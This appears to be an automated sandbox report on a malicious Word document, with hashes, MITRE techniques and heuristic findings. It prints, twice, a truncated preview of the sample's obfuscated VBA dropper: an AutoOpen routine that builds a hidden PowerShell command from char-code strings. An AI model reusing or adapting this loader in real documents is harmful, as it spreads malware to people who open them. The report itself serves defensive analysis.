Office (OLE) malware analysis — malicious · 61c31bc684cdca57

MALICIOUS

Office (OLE)

242.0 KB Created: 2018-07-05 16:21:00 Authoring application: Microsoft Office Word First seen: 2018-07-27

MD5: 03146027361568a823d94f5eeb608e46 SHA-1: c085ad53184e35fc7d9fc047d51b2f53a01082bb SHA-256: 61c31bc684cdca57e9dc59e9fcdce28009d2cbeaefe90cb168c6331650761c63

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro initiates execution, utilizing CreateObject and Shell calls. Notably, the script constructs a PowerShell command by concatenating strings, including 'powershell', 'VerBOsEP', 'rEfErEncE', and '.Tost' + 'rInG' + '[1,3]' + ''X' + '-JOIN', which likely aims to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6602068-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6602068-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15879 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15879 bytes
SHA-256: `01847ca4beda634f7ce362f61eb6e12988580eaca976eda2292e5ee5dab836ae`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "oivMGmDz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next zuKNwq = (71996 - YofcqA + (hTUiv * MGiib - 59692 * wOnhvH)) LcPqd = (50851 - zZdhF + (jjlNE * lnciVL - 8705 * KAzjja)) qEnRf = (19862 - JFtaL + (hCUrQ * ljztfY - 97373 * zbzwip)) ZmLafT = (49137 - ltMcwd + (SmvlsL * thRLh - 16154 * vVBrVu)) UzazTtQohw (GSzDQwMP + MnbFpHjzD + iLoBnodE + zihdj) FQYRu = (60166 - PwwHjr + (bzVQtd * TlRhp - 46581 * lcikN)) VUtONv = (4668 - jAOEa + (uzdLb * mfHkF - 13591 * iVPXSR)) End Sub Attribute VB_Name = "ccCfiGG" Function GSzDQwMP() On Error Resume Next RAdhMi = (11112 - ZJhGT - rSUDD / wvAzHi) - 6172 / DrkafV - 66306 / wtJbPu / (MCvPhZ - uNAbkV + 80 + ZdbKDi) wlAYW = (50583 - qZPMAL - auPCJ / tuEDK) - 28553 / nkOYz - 13642 / UDjXZa / (WQsrz - kJpTzp + 75231 + BhwNH) GKqNtk = (70059 - NrdjR - iLLLY / duvZJ) - 38410 / SWkJR - 9298 / PFCiF / (AmbbV - VBWVk + 3727 + BRMORD) jVFET = "wershell" + " " + " " + " " + "& " + Chr(40) + " $VE" + "rBOsEP" + "rEfErEncE" zLPzC = (98642 - AOFjLN - oVnhp / oHLMMR) - 94689 / jwuiN - 62650 / ztAiKX / (fIRhTq - jaFDAL + 83683 + ClkCj) zlFUau = (52543 - EwowMS - VKwWZ / kMlUT) - 61315 / EqPnv - 40573 / wUZTT / (rjXLh - KGptl + 3347 + WNYTAG) iNiAAr = (1791 - AkcDA - EpZmG / uOzim) - 27189 / EYBZNF - 96853 / SoLjW / (hpIIw - JJjtNA + 86915 + PQENms) EJZLGmibU = ".Tost" + "rInG" + Chr(40) + Chr(41) + "[1,3]" + Chr(43) + "'X" + "'-JOIN" + "''" + Chr(41) + Chr(40) + " " + Chr(40) + " " + "[ChaR" + "[]] " + Chr(40) + " 120 , 4" zszhHN = (87540 - QJdPqG - iWuWzu / liMNVS) - 81971 / UBlsb - 15618 / TnnXSs / (JZnvwG - EzYzG + 14168 + Utsbq) cizfqi = (4748 - jZbAn - naaVk / QBMvV) - 1456 / zuvwcw - 16274 / vpQGbC / (QzWFTw - TRFGjY + 52442 + CJpwC) Fzjjr = (53439 - CiYGcC - iwGZAX / bMUwwr) - 28297 / InRPzL - 69361 / HkHnCY / (FPzGHm - JQsWdk + 22841 + ukYIWk) FjuLw = (79657 - klCkOj - kHIMdB / bizbX) - 80733 / OuCrR - 4698 / WNawUX / (kbAzA - ARAJGn + 79944 + BvkbzW) CzCitdb = "0 ,31,31," + " 97," + "50 ," + " 57, 43 ," + " 113,51 " + ", 62 ,54 " + ",57, 63,4" + "0, 124 ," + " 18 , 57" + " ,40, 1" zEfork = (19529 - JMSkN - PhhSb / rVQkFd) - 75804 / QcAkc - 43381 / BnKpi / (pwTFq - ctIRk + 72332 + ldnvj) DwjMhH = (82257 - OtXds - CYwiO / KMILQ) - 98549 / ltNsa - 51509 / DqQHXi / (afOuG - ojEqRU + 79892 + rqVwip) tVMvaQZHWH = "14 , 11" + ", 57,62" + ", 31 ,48" + " ,53,57,5" + "0, 40,103" + ", 120 " + ", 18,53, " + "43,97 " BwCGR = (22047 - oGjLk - tQJGdC / XbGlzM) - 230 / LpsIQi - 25875 / DmXXvB / (oiBJw - mcMCU + 56953 + qRHFL) RnCTCj = (36410 - TGitV - RGzDD / ZMjFwA) - 75952 / miSMi - 47389 / BbiGQl / (IGYaIJ - KKBHW + 7828 + HzXCs) zsmzdOlu = ",123,5" + "2,40" + ", 40" + ", 44 " + ",102,115," + " 115 ,4" nSLwXQ = (59631 - wnFsE - hWsij / TQELUo) - 88662 / LEXaMT - 35893 / PMlIf / (FURLAh - AJObr + 42176 + OzbiW) DjTXL = "3, 43" + " ,43, 114" + ", 56,51" + " ,63 ,59 " + ",53," + " 52," + " 51 ,49" + ",50, 61," + " 37,1" + "14, 51 ," kEmth = (33096 - JcmEk - ldZjn / dUCBwJ) - 68610 / Tzjazk - 31086 / PvsHNM / (CtIlO - DaZInv + 86070 + Dokzjs) PifkHc = (13151 - sbvXKj - JoMPKu / wUzur) - 29864 / DlfrNF - 75067 / PanudW / (wwNiG - uJltw + 13444 + KnMkrw) QjwiGd = (46789 - bQRmwY - hMJRIc / zRwGUc) - 27581 / ChhLf - 34505 / AzpWX / (dfUhl - iYhijN + 42898 + fjzIwX) CQPEwKLSCNI = "46, 59" + " ,115" + ", 13, 53" + ", 109, 48" + " ,5,31" + " ,19" + " ,115 ,28" + " , 52 ,4" + "0 , 40 ,4" + "4, 102, " + "115 " GSzDQwMP = jVFET + EJZLGmibU + CzCitdb + tVMvaQZHWH + zsmzdOlu + DjTXL + CQPEwKLSCNI FAEqN = (57542 - jXRwzH - XVrQZG / LoXMM) - 12417 / JjTOG - 63711 / kJDpw / (bQdwiv - Mbockp + 89357 + LjdAXi) wisanm = (22493 - acYquL - iRHvhs / iRmIZd) - 49030 / ZzEafO - 79859 / LZQAC / (QDzAF - jPnpzH + 7477 + ofNiOl) End Function Function MnbFpHjzD() ... (truncated)

SHA-256: 01847ca4beda634f7ce362f61eb6e12988580eaca976eda2292e5ee5dab836ae

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "oivMGmDz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   zuKNwq = (71996 - YofcqA + (hTUiv * MGiib - 59692 * wOnhvH))
   LcPqd = (50851 - zZdhF + (jjlNE * lnciVL - 8705 * KAzjja))
   qEnRf = (19862 - JFtaL + (hCUrQ * ljztfY - 97373 * zbzwip))
   ZmLafT = (49137 - ltMcwd + (SmvlsL * thRLh - 16154 * vVBrVu))
UzazTtQohw (GSzDQwMP + MnbFpHjzD + iLoBnodE + zihdj)
   FQYRu = (60166 - PwwHjr + (bzVQtd * TlRhp - 46581 * lcikN))
   VUtONv = (4668 - jAOEa + (uzdLb * mfHkF - 13591 * iVPXSR))
End Sub


Attribute VB_Name = "ccCfiGG"
Function GSzDQwMP()
On Error Resume Next
RAdhMi = (11112 - ZJhGT - rSUDD / wvAzHi) - 6172 / DrkafV - 66306 / wtJbPu / (MCvPhZ - uNAbkV + 80 + ZdbKDi)
   wlAYW = (50583 - qZPMAL - auPCJ / tuEDK) - 28553 / nkOYz - 13642 / UDjXZa / (WQsrz - kJpTzp + 75231 + BhwNH)
   GKqNtk = (70059 - NrdjR - iLLLY / duvZJ) - 38410 / SWkJR - 9298 / PFCiF / (AmbbV - VBWVk + 3727 + BRMORD)
jVFET = "wershell" + "      " + "        " + "     " + "& " + Chr(40) + " $VE" + "rBOsEP" + "rEfErEncE"
zLPzC = (98642 - AOFjLN - oVnhp / oHLMMR) - 94689 / jwuiN - 62650 / ztAiKX / (fIRhTq - jaFDAL + 83683 + ClkCj)
   zlFUau = (52543 - EwowMS - VKwWZ / kMlUT) - 61315 / EqPnv - 40573 / wUZTT / (rjXLh - KGptl + 3347 + WNYTAG)
   iNiAAr = (1791 - AkcDA - EpZmG / uOzim) - 27189 / EYBZNF - 96853 / SoLjW / (hpIIw - JJjtNA + 86915 + PQENms)
EJZLGmibU = ".Tost" + "rInG" + Chr(40) + Chr(41) + "[1,3]" + Chr(43) + "'X" + "'-JOIN" + "''" + Chr(41) + Chr(40) + " " + Chr(40) + " " + "[ChaR" + "[]] " + Chr(40) + " 120 , 4"
zszhHN = (87540 - QJdPqG - iWuWzu / liMNVS) - 81971 / UBlsb - 15618 / TnnXSs / (JZnvwG - EzYzG + 14168 + Utsbq)
   cizfqi = (4748 - jZbAn - naaVk / QBMvV) - 1456 / zuvwcw - 16274 / vpQGbC / (QzWFTw - TRFGjY + 52442 + CJpwC)
   Fzjjr = (53439 - CiYGcC - iwGZAX / bMUwwr) - 28297 / InRPzL - 69361 / HkHnCY / (FPzGHm - JQsWdk + 22841 + ukYIWk)
   FjuLw = (79657 - klCkOj - kHIMdB / bizbX) - 80733 / OuCrR - 4698 / WNawUX / (kbAzA - ARAJGn + 79944 + BvkbzW)
CzCitdb = "0 ,31,31," + " 97," + "50 ," + " 57, 43 ," + " 113,51 " + ", 62 ,54 " + ",57, 63,4" + "0, 124 ," + " 18 , 57" + " ,40, 1"
zEfork = (19529 - JMSkN - PhhSb / rVQkFd) - 75804 / QcAkc - 43381 / BnKpi / (pwTFq - ctIRk + 72332 + ldnvj)
   DwjMhH = (82257 - OtXds - CYwiO / KMILQ) - 98549 / ltNsa - 51509 / DqQHXi / (afOuG - ojEqRU + 79892 + rqVwip)
tVMvaQZHWH = "14 , 11" + ", 57,62" + ", 31 ,48" + " ,53,57,5" + "0, 40,103" + ", 120 " + ", 18,53, " + "43,97 "
BwCGR = (22047 - oGjLk - tQJGdC / XbGlzM) - 230 / LpsIQi - 25875 / DmXXvB / (oiBJw - mcMCU + 56953 + qRHFL)
   RnCTCj = (36410 - TGitV - RGzDD / ZMjFwA) - 75952 / miSMi - 47389 / BbiGQl / (IGYaIJ - KKBHW + 7828 + HzXCs)
zsmzdOlu = ",123,5" + "2,40" + ", 40" + ", 44 " + ",102,115," + " 115 ,4"
nSLwXQ = (59631 - wnFsE - hWsij / TQELUo) - 88662 / LEXaMT - 35893 / PMlIf / (FURLAh - AJObr + 42176 + OzbiW)
DjTXL = "3, 43" + " ,43, 114" + ", 56,51" + " ,63 ,59 " + ",53," + " 52," + " 51 ,49" + ",50, 61," + " 37,1" + "14, 51 ,"
kEmth = (33096 - JcmEk - ldZjn / dUCBwJ) - 68610 / Tzjazk - 31086 / PvsHNM / (CtIlO - DaZInv + 86070 + Dokzjs)
   PifkHc = (13151 - sbvXKj - JoMPKu / wUzur) - 29864 / DlfrNF - 75067 / PanudW / (wwNiG - uJltw + 13444 + KnMkrw)
   QjwiGd = (46789 - bQRmwY - hMJRIc / zRwGUc) - 27581 / ChhLf - 34505 / AzpWX / (dfUhl - iYhijN + 42898 + fjzIwX)
CQPEwKLSCNI = "46, 59" + " ,115" + ", 13, 53" + ", 109, 48" + " ,5,31" + " ,19" + " ,115 ,28" + " , 52 ,4" + "0 , 40 ,4" + "4, 102, " + "115 "
GSzDQwMP = jVFET + EJZLGmibU + CzCitdb + tVMvaQZHWH + zsmzdOlu + DjTXL + CQPEwKLSCNI
   FAEqN = (57542 - jXRwzH - XVrQZG / LoXMM) - 12417 / JjTOG - 63711 / kJDpw / (bQdwiv - Mbockp + 89357 + LjdAXi)
   wisanm = (22493 - acYquL - iRHvhs / iRmIZd) - 49030 / ZzEafO - 79859 / LZQAC / (QDzAF - jPnpzH + 7477 + ofNiOl)
End Function
Function MnbFpHjzD()
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.